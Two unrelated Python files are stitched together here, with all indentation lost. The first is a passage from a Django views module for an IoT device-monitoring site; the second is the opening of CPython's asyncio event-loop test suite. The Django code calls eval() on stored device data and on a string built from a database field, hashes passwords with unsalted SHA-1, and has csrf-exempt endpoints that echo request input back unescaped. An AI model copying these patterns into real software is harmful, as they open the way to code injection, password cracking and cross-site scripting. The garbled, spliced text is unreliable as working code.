Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0])
return HttpResponse('666')
else:
return HttpResponse('555')
else:
return redirect('/home/' + request.session.get('USERNAME'))
else:
return redirect('/')
else:
return redirect('/')
def adminAdd(request, username):
if request.method == 'POST':
is_login = request.session.get('IS_LOGIN', False)
if is_login:
if request.session.get('USERNAME') == username:
# 判断是否为此用户
# 获得post数据
sub_id = request.POST.get('sub_id')
sys_id = request.POST.get('system_id')
# 系统对象
sys_obj = System.objects.filter(
id=sys_id,
admin=Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0])
if sys_obj:
# 存在管理权限
if sys_obj[0].admin.filter(id=sub_id):
return HttpResponse('444')
else:
# 添加管理权限
sys_obj[0].admin.add(sub_id)
# 操作记录
Operation.objects.create(code=205, user=
Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0])
return HttpResponse('666')
else:
return HttpResponse('555')
else:
return redirect('/home/' + request.session.get('USERNAME'))
else:
return redirect('/')
else:
return redirect('/')
def userChange(request, username):
if request.method == 'POST':
is_login = request.session.get('IS_LOGIN', False)
if is_login:
if request.session.get('USERNAME') == username:
# 判断是否为此用户
# 获得post数据
reg_name = request.POST.get('name')
reg_phone = request.POST.get('phone')
reg_email = request.POST.get('email')
reg_age = request.POST.get('age')
reg_sex = request.POST.get('sex')
# 获得用户对象
user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
# 判断用户名
if reg_name == user_obj.name:
# 判断邮箱
if reg_email == user_obj.email:
# 判断手机
if reg_phone == user_obj.phone:
if not reg_age:
reg_age = 0
# 修改
Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID')).update(
sex=reg_sex, age=reg_age)
# 操作记录
Operation.objects.create(code=103, user=user_obj)
return HttpResponse('666')
else:
user_exist = Users.objects.filter(phone=reg_phone)
if user_exist:
# 手机号存在
return HttpResponse('777')
else:
user_obj.phone = reg_phone
user_obj.save()
Operation.objects.create(code=103, user=user_obj)
return HttpResponse('666')
else:
user_exist = Users.objects.filter(email=reg_email)
if user_exist:
# 邮箱存在
return HttpResponse('888')
else:
user_obj.email = reg_email
user_obj.save()
Operation.objects.create(code=103, user=user_obj)
return HttpResponse('666')
else:
user_obj.name = reg_name
user_obj.save()
Operation.objects.create(code=103, user=user_obj)
return HttpResponse('666')
else:
return redirect('/home/' + request.session.get('USERNAME') + '/center')
else:
return redirect('/home/' + request.session.get('USERNAME') + '/center')
else:
return redirect('/')
def passwordChange(request, username):
if request.method == 'POST':
is_login = request.session.get('IS_LOGIN', False)
if is_login:
if request.session.get('USERNAME') == username:
# 判断是否为此用户
user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
old_pwd = request.POST.get('o_password')
new_pwd = request.POST.get('password')
# 判断旧密码是否正确
if user_obj.password == hashlib.sha1(old_pwd.encode(encoding='utf8')).hexdigest():
# 修改密码
user_obj.password = hashlib.sha1(new_pwd.encode(encoding='utf8')).hexdigest()
user_obj.save()
Operation.objects.create(code=103, user=user_obj)
# 消除session登陆
del request.session['USERNAME']
del request.session['DOMAIN_ID']
request.session['IS_LOGIN'] = False
# 记录操作
Operation.objects.create(code=103, user=user_obj)
Login.objects.create(user=user_obj, operation='OUT', IP=request.META['REMOTE_ADDR'])
return HttpResponse('666')
else:
return HttpResponse('777')
else:
return redirect('/home/' + request.session.get('USERNAME') + '/center')
else:
return redirect('/home/' + request.session.get('USERNAME') + '/center')
else:
return redirect('/')
def waringDevice(user_obj):
devices = []
system = []
waring_devices = []
for system_obj in user_obj.system.all():
for device_obj in system_obj.device.all():
devices.append(device_obj)
for device_obj in devices:
if device_obj.data.filter(waring=1):
system.append(device_obj.system)
waring_devices.append(device_obj)
return system, waring_devices
def getwaring(request):
if request.method == 'GET':
is_login = request.session.get('IS_LOGIN', False)
if is_login:
# 获取系统对象
user_obj = \
Users.objects.filter(username=request.session.get('USERNAME'),
domain_id=request.session.get('DOMAIN_ID'))[
0]
waring_system_list, waring_device_list = waringDevice(user_obj)
if waring_device_list or waring_device_list:
return HttpResponse('yes')
else:
return HttpResponse('no')
else:
return redirect('/')
else:
return redirect('/')
# auth_data 函数
def jinger(device, data):
data_list = device.data.filter(~Q(waring=0) & ~Q(waring=1), model=0).order_by('-id')
if data_list:
pre_data = eval(data_list[0].data)
if (int(data['Lon']) == 0 and int(data['Lat']) == 0):
data['Lon'] = pre_data['Lon']
data['Lat'] = pre_data['Lat']
if data['Turn']:
return True
return False
elif (abs(float(pre_data['Lon']) - float(data['Lon'])) > 0.001) or (
abs(float(pre_data['Lat']) - float(data['Lat'])) > 0.001):
return True
else:
return False
elif (int(data['Lon']) == 0 and int(data['Lat']) == 0):
data['Lon'] = '119.4655'
data['Lat'] = '32.19605'
if data['Turn']:
return True
return False
else:
if data['Turn']:
return True
return False
def detritus(device, data):
data_list = device.data.filter(~Q(waring=0) & ~Q(waring=1), model=0).order_by('-id')
if data_list:
pre_data = eval(data_list[0].data)
if (int(data['Lon']) == 0 and int(data['Lat']) == 0):
data['Lon'] = pre_data['Lon']
data['Lat'] = pre_data['Lat']
if data['Full']:
return True
return False
elif (abs(float(pre_data['Lon']) - float(data['Lon'])) > 0.001) or (
abs(float(pre_data['Lat']) - float(data['Lat'])) > 0.001):
return True
else:
return False
elif (int(data['Lon']) == 0 and int(data['Lat']) == 0):
data['Lon'] = '119.4655'
data['Lat'] = '32.19605'
if data['Full']:
return True
return False
else:
if data['Full']:
return True
return False
def parquer(device, data):
data_list = device.data.filter(~Q(waring=0) & ~Q(waring=1), model=0).order_by('-id')
if data_list:
pre_data = eval(data_list[0].data)
if (int(data['Lon']) == 0 and int(data['Lat']) == 0):
data['Lon'] = pre_data['Lon']
data['Lat'] = pre_data['Lat']
return False
elif (abs(float(pre_data['Lon']) - float(data['Lon'])) > 0.001) or (
abs(float(pre_data['Lat']) - float(data['Lat'])) > 0.001):
return True
else:
return False
else:
if (int(data['Lon']) == 0 and int(data['Lat']) == 0):
data['Lon'] = '119.4655'
data['Lat'] = '32.19605'
return False
def lumiere(device, data):
data_list = device.data.filter(~Q(waring=0) & ~Q(waring=1), model=0).order_by('-id')
if data_list:
pre_data = eval(data_list[0].data)
if (int(data['Lon']) == 0 and int(data['Lat']) == 0):
data['Lon'] = pre_data['Lon']
data['Lat'] = pre_data['Lat']
elif (abs(float(pre_data['Lon']) - float(data['Lon'])) > 0.001) or (
abs(float(pre_data['Lat']) - float(data['Lat'])) > 0.001):
return True
elif (int(data['Lon']) == 0 and int(data['Lat']) == 0):
data['Lon'] = '119.4655'
data['Lat'] = '32.19605'
if not (data['Top-Light'] == 1 and data['Bottom-light'] == 1 and data['Switch-Light'] == 0) or not (
data['Top-Light'] == 0 and data['Bottom-light'] == 1 and data['Switch-Light'] == 1):
return True
else:
if data['Top-Light'] == 1 and data['Bottom-light'] == 1 and data['Switch-Light'] == 0:
start_time = datetime.datetime.strptime(str(datetime.datetime.now().date()) + '5:30', '%Y-%m-%d%H:%M')
end_time = datetime.datetime.strptime(str(datetime.datetime.now().date()) + '7:20', '%Y-%m-%d%H:%M')
now_time = datetime.datetime.now()
if (now_time > start_time) and (now_time < end_time):
return True
else:
start_time = datetime.datetime.strptime(str(datetime.datetime.now().date()) + '17:45', '%Y-%m-%d%H:%M')
end_time = datetime.datetime.strptime(str(datetime.datetime.now().date()) + '19:15', '%Y-%m-%d%H:%M')
now_time = datetime.datetime.now()
if (now_time > start_time) and (now_time < end_time):
return True
return False
def others(device, data):
data_list = device.data.filter(~Q(waring=0) & ~Q(waring=1), model=0).order_by('-id')
if data_list:
pre_data = eval(data_list[0].data)
if (int(data['Lon']) == 0 and int(data['Lat']) == 0):
data['Lon'] = pre_data['Lon']
data['Lat'] = pre_data['Lat']
return False
elif (abs(float(pre_data['Lon']) - float(data['Lon'])) > 0.001) or (
abs(float(pre_data['Lat']) - float(data['Lat'])) > 0.001):
return True
else:
return False
elif (int(data['Lon']) == 0 and int(data['Lat']) == 0):
data['Lon'] = '119.4655'
data['Lat'] = '32.19605'
return False
else:
return False
# 数据消息队列
queue = Queue()
# oneNET数据排序函数
# {'Lon':'经度','Lat':'纬度','Switch':'设备状态','Cycle':'订阅周期','Switch-Light':'路灯状态','Top-Light':'光照状态','Bottom-Light':'照明状态',}
def dataSort(device,data):
type_list = eval(device.system.type).keys()
# 定义数据字典
new_data = {}
# 按照数据模板对数据进行格式化
for type_obj in type_list:
new_data[type_obj] = data[type_obj]
return str(new_data)
# oneNET数据处理函数
def onenetHandle(queue):
while True:
data = queue.get()
# 获得数据
system_platform, device_obj = authDevice(data['sys_code'], data['IMEI'])
if system_platform:
auth_data = system_platform.lower() + '''(device_obj,data['data'])'''
if eval(auth_data):
new_data = dataSort(device_obj, data['data'])
Data.objects.create(device=device_obj, model=0, data=new_data, waring=1)
else:
new_data = dataSort(device_obj, data['data'])
Data.objects.create(device=device_obj, model=0, data=new_data)
else:
pass
def authDevice(sys_code, IMEI):
if Device.objects.filter(IMEI=IMEI):
device_obj = Device.objects.filter(IMEI=IMEI)[0]
if device_obj.system.devicecode == sys_code:
return device_obj.system.platform, device_obj
else:
return False
else:
return False
# 多线程处理数据
threads = [Thread(target=onenetHandle, args=(queue,)) for i in range(4)]
for i in range(len(threads)):
threads[i].start()
# 通过队列堵塞完成异步操作
@csrf_exempt
def onenetDataIn(request):
if request.method == 'GET':
return HttpResponse(request.GET['msg'])
else:
msg = json.loads(request.body)['msg']
if 'value' in msg.keys():
queue.put(msg['value'])
return HttpResponse("123")
# 测试oneNET
@csrf_exempt
def onenetDataTest(request):
if request.method == 'GET':
return HttpResponse(request.GET['msg'])
else:
msg = json.loads(request.body)['msg']
print(type(msg), msg)
if 'value' in msg.keys():
data = msg['value']
print(type(data), data)
return HttpResponse("123")
else:
return HttpResponse("123")
|
test_events.py | """Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import types
import errno
import unittest
from unittest import mock
import weakref
if sys.platform not in ('win32', 'vxworks'):
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
from test.support import socket_helper
from test.support import threading_helper
from test.support import ALWAYS_EQ, LARGEST, SMALLEST
def tearDownModule():
asyncio.set_event_loop_policy(None)
def broken_unix_getsockname():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform.startswith("aix"):
return True
elif sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = loop.create_future()
self.done = loop.create_future()
def _assert_state(self, *expected):
if self.state not in expected:
raise AssertionError(f'state: {self.state!r}, expected: {expected!r}')
def connection_made(self, transport):
self.transport = transport
self._assert_state('INITIAL')
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
self._assert_state('CONNECTED')
self.nbytes += len(data)
def eof_received(self):
self._assert_state('CONNECTED')
self.state = 'EOF'
def connection_lost(self, exc):
self._assert_state('CONNECTED', 'EOF')
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = loop.create_future()
def _assert_state(self, expected):
if self.state != expected:
raise AssertionError(f'state: {self.state!r}, expected: {expected!r}')
def connection_made(self, transport):
self.transport = transport
self._assert_state('INITIAL')
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
self._assert_state('INITIALIZED')
self.nbytes += len(data)
def error_received(self, exc):
self._assert_state('INITIALIZED')
def connection_lost(self, exc):
self._assert_state('INITIALIZED')
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = loop.create_future()
def _assert_state(self, expected):
if self.state != expected:
raise AssertionError(f'state: {self.state!r}, expected: {expected!r}')
def connection_made(self, transport):
self.transport = transport
self._assert_state(['INITIAL'])
self.state.append('CONNECTED')
def data_received(self, data):
self._assert_state(['INITIAL', 'CONNECTED'])
self.nbytes += len(data)
def eof_received(self):
self._assert_state(['INITIAL', 'CONNECTED'])
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
self._assert_state(['INITIAL', 'CONNECTED', 'EOF'])
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = loop.create_future()
def _assert_state(self, expected):
if self.state != expected:
raise AssertionError(f'state: {self.state!r}, expected: {expected!r}')
def connection_made(self, transport):
self.transport = transport
self._assert_state('INITIAL')
self.state = 'CONNECTED'
def connection_lost(self, exc):
self._assert_state('CONNECTED')
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = loop.create_future()
self.completed = loop.create_future()
self.disconnects = {fd: loop.create_future() for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(),
2: asyncio.Event()}
def _assert_state(self, expected):
if self.state != expected:
raise AssertionError(f'state: {self.state!r}, expected: {expected!r}')
def connection_made(self, transport):
self.transport = transport
self._assert_state('INITIAL')
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
self._assert_state('CONNECTED')
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
self._assert_state('CONNECTED')
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
self._assert_state('CONNECTED')
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
self._assert_state('CONNECTED')
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
async def coro1():
await asyncio.sleep(0)
async def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
with self.assertWarnsRegex(
RuntimeWarning,
r"coroutine \S+ was never awaited"
):
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
self.loop.run_forever()
self.assertEqual(results, ['hello world'])
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_run_in_executor_cancel(self):
called = False
def patched_call_soon(*args):
nonlocal called
called = True
def run():
time.sleep(0.05)
f2 = self.loop.run_in_executor(None, run)
f2.cancel()
self.loop.run_until_complete(
self.loop.shutdown_default_executor())
self.loop.close()
self.loop.call_soon = patched_call_soon
self.loop.call_soon_threadsafe = patched_call_soon
time.sleep(0.4)
self.assertFalse(called)
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
@unittest.skipUnless(hasattr(signal, 'setitimer'),
'need signal.setitimer()')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
@unittest.skipUnless(hasattr(signal, 'setitimer'),
'need signal.setitimer()')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@socket_helper.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = socket_helper.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.create_server(('127.0.0.1', 0), backlog=1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
threading_helper.join_thread(thread)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=support.LOOPBACK_TIMEOUT)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
async def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
